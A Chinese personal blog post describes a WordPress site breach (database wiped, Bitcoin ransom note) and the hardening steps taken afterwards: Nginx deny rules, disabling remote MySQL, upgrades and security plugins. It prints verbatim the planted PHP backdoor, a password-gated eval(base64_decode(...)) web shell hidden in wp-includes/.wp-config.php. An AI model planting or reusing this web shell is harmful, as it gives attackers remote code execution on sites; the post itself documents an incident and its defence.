Blog 被黑记录

2022-07-19 14:27:58 浏览数 (1)

  • 1 被黑记录
  • 2 安全加固
    • 2.1 密码更换
    • 2.2 使用密钥登陆
    • 2.3 清理 php 文件
    • 2.4 Nginx 配置
    • 2.5 关闭 MySQL 的远程模式
    • 2.6 PHP 和 WordPress 升级
    • 2.7 几个有用的插件
    • 2.8 安全隐患扫描

最近这个 blog 被黑了,如果你恰巧那一天访问,你会看到所有数据都丢失了,网站打开的页面,是一个初始配置数据库连接的页面。我记得几个月前,这个 blog 曾经遭受过 XML-RPC 攻击,我当时把问题的分析和处理记录在了这里。这一次,可不只是网站拒绝服务这样的问题了,而是整个网站的数据库都被干掉了。

被黑记录

问题出现的时候,网站访问不了了,我登上 MySQL 数据库查看了一下,发现所有数据都删掉了,只留下了一个 WARNING 的表:

上面说的也很清楚,让我往指定地址打 0.08 个比特币,他们就可以把数据还给我,要不然 10 天以后就会把数据库里的数据公开。在 Bitcoin Abuse Database 上,我找到了类似的数条记录。

还好,我每天都有备份,因此丢失的数据其实比较少。当然了,这是我个人的 blog,并没有存放什么私密的信息。

之后,我留意到黑客在我的 WordPress 目录中留了一个后门文件:

?

1 2

cat wp-includes/.wp-config.php <?php echo"abrval";error_reporting(0);if(isset($_REQUEST['lanfren']) && md5($_REQUEST['lanfren']) == '863b84c60e8377d9400b97e449a96e96' && isset($_REQUEST['lanfra'])) eval(base64_decode($_REQUEST['lanfra']));?>

在 wp-content/plugins/index.php 中,也加上了类似的内容。这段逻辑也不难理解,请求参数 lanfren 的串在 md5 之后,如果和指定串相等,就用 base64 解码 lanfra 的参数(估计参数值是一串代码),并使用 eval 执行。

但是这件事情倒是在催促我,即便是个人 blog 站点,必要的安全加固操作还是要做的。之前这些年来都没有出现问题,但是这次在 VPS 切换后没有几周,就出了这样的幺蛾子。

安全加固

下面就是一些必要的操作。

密码更换

首先,需要更换掉密码,主要包括 WordPress 的密码,以及 MySQL 的密码。

WordPress 存储密码的时候,是经过摘要了的,并非密码原文,但是更换密码依然是推荐的方式。

另外,我推荐大家都去‘;–have i been pwned? 这个网站上看一下自己的 email 账号信息有没有泄露,我的几个 email 里面,大部分都已经跪了。

这个网站上也有一个链接,链到 1password 上去,安装这个 app 以后,可以检查自己的密码是否已经泄露(它使用密码散列后的串来进行校验,因此不用担心在这一步泄露密码):

当然,记住那么多密码也是比较困难的一件事情,我使用密码管理软件 LastPass。

使用密钥登陆

以前这篇文章已经介绍过。

清理 php 文件

php 是真正的代码文件,访问就可以执行,因此这些文件是首先要认真对待的。

WordPress 默认的目录下,有一些 php 文件是可以拿掉的,这样就杜绝了用户的访问可能。哪怕这些文件都是有用的,也可以压缩存放到其它地方去。

有一些文件可以改名隐藏起来,比如登陆用的 wp-login.php。如果需要这个文件,不能删除或改名,但又不想用户访问,那就可以用.htaccess 或 Nginx 配置来保护起来。

Nginx 配置

有一些访问我是想屏蔽掉的,比如:

1 2

location ~ /(wp-content|uploads|images)/.*.php$ { deny all; } location ~ /wp-(config|mail|cron|activate|settings|load|blog-header|links-opml|signup|login).php$ { deny all; }

4xx 和 5xx 的页面也统统导向一个不暴露 Nginx 信息的页面:

1

error_page 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 421 422 423 424 425 426 428 429 431 451 500 501 502 503 504 505 506 507 508 510 511 /error.html;

关闭 MySQL 的远程模式

编辑/etc/my.cnf,添加:

1

skip-networking

重启 MySQL:

1

lnmp mysql restart

这样就杜绝了远程访问数据库的可能,MySQL 只能通过 localhost 来访问。

PHP 和 WordPress 升级

PHP 的版本是 5.6.40 的,太老了。使用 lnmp 自带的升级工具 upgrade.sh 就可以完成。

还有一个事儿是 WordPress 升级,这个在管理台就可以完成。

几个有用的插件

第一个是 UpdraftPlus,这个比一般的备份功能更好的是,它把备份后的上传功能集成进去了,我配置了备份以后上传到另外一台 FTP 服务器的功能。

第二个是 Sucuri WordPress Plugin,有一些很实用的安全方面的功能,比如 WordPress 文件完整性检查,前面说的那个后门文件就是通过这个插件发现的。后来我使用了 Wordfence,这个功能要更加强大一些,防火墙和文件扫描功能尤其好用。

安全隐患扫描

网上有不少方便的扫描工具,比如 Website Vulnerability Scanner,下面这几个问题在 PHP 升级之后就都解决了:

还有一个是端口扫描,服务器开放的端口自己心中有数,比如可以使用这个工具。

文章未经特殊标明皆为本人原创,未经许可不得用于任何商业用途,转载请保持完整性并注明来源链接 《四火的唠叨》

0 人点赞